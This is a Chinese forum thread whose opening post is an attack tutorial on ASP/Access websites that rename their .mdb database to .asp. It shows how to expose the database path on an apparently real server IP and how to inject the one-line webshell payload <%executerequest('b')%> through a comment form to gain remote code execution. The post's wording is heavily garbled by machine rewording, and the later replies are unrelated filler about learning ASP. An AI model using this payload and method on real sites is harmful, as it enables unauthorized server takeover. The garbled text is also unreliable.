精灵巫婆 发表于 2015-1-16 23:37:24

ASP网站制作之改mdb为asp所带来的劫难

因为ASP脚本语言非常简单,因此其代码也简单易懂,结合HTML代码,可快速地完成网站的应用程序。还无法完全实现一些企业级的功能:完全的集群、负载均横。多是跟着收集平安手艺的开展吧,办理员的本质都在进步,在利用access+asp体系时,为不数据库被人下载,到把mdb改成asp或asa。先不说间接改后缀,间接能够用网快等工具间接下载,实在如许你已是为进侵者翻开了年夜门。进侵者能够使用asp/asa为后缀的数据库间接失掉webshell。
1.思绪
人人都晓得<%%>为asp文件的标记符,也就是说一个asp文件只会往实行<%%>之间的代码,access+asp的web体系的一切数据都是寄存在数据库文件里(mdb文件),因为办理者把mdb文件改成了asp文件,假如我们提交的数据里包括有<%%>,那当我们会见这个asp数据库的时分就会往实行<%%>之间的代码。如许招致我们只提反目意代码给数据库,那末asp后缀的数据库就是我们的webshell了。

2.示例
任意找个方针,起首我们暴库,看是否是asp后缀的数据库:
<http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210>
前往:
MicrosoftVBScript编译器毛病毛病800a03f6短少End/iisHelp/common/500-100.asp,行?4MicrosoftJETDatabaseEngine毛病80004005D:log_mdb\%29dlog_mdb%29.asp不是一个无效的路径。断定路径称号拼写是不是准确,和是不是毗连到文件寄存的服务器。/test/conn.asp,行?
我们提交:<http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp>前往一堆的乱码,如许我们能够间接用网际慢车等工具间接下载数据库(这里我们不会商)。我们回到主页看到有供应“网友批评”功效。我们注册个用户,发一条批评:
<%executerequest("b")%>

如许我们就把asp代码:<%executerequest("b")%>写进了数据库,那末数据库:就是我们的webshell咯。提交:<http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp>在乱码的最初我们看到:
/iisHelp/common/500-100.asp,行?4MicrosoftVBScript运转时毛病毛病800a000d范例不婚配

再见西城 发表于 2015-1-27 20:36:12

代码逻辑混乱,难于管理:由于ASP是脚本语言混合html编程,所以你很难看清代码的逻辑关系,并且随着程序的复杂性增加,使得代码的管理十分困难,甚至超出一个程序员所能达到的管理能力,从而造成出错或这样那样的问题。

再现理想 发表于 2015-2-11 08:29:04

下面简单介绍一下我学习ASP的方法,希望对想学习ASP的朋友有所帮助...

蒙在股里 发表于 2015-3-2 02:53:02

我就感觉到ASP和一些常用的数据库编程以及软件工程方面的思想是非常重要的。我现在也在尝试自己做网页,这其中就用到了ASP,我想它的作用是可想而知的。

若相依 发表于 2015-3-11 02:00:33

弱类型造成潜在的出错可能:尽管弱数据类型的编程语言使用起来回方便一些,但相对于它所造成的出错几率是远远得不偿失的。

柔情似水 发表于 2015-3-17 18:26:49

它可通过内置的组件实现更强大的功能,如使用A-DO可以轻松地访问数据库。

变相怪杰 发表于 2015-3-24 19:10:08

下载一个源代码,然后再下载一个VBScript帮助,在源代码中遇到不认识的函数或是其他什么程序,都可以查帮助进行解决,这样学习效率很高。
页: [1]
查看完整版本: ASP网站制作之改mdb为asp所带来的劫难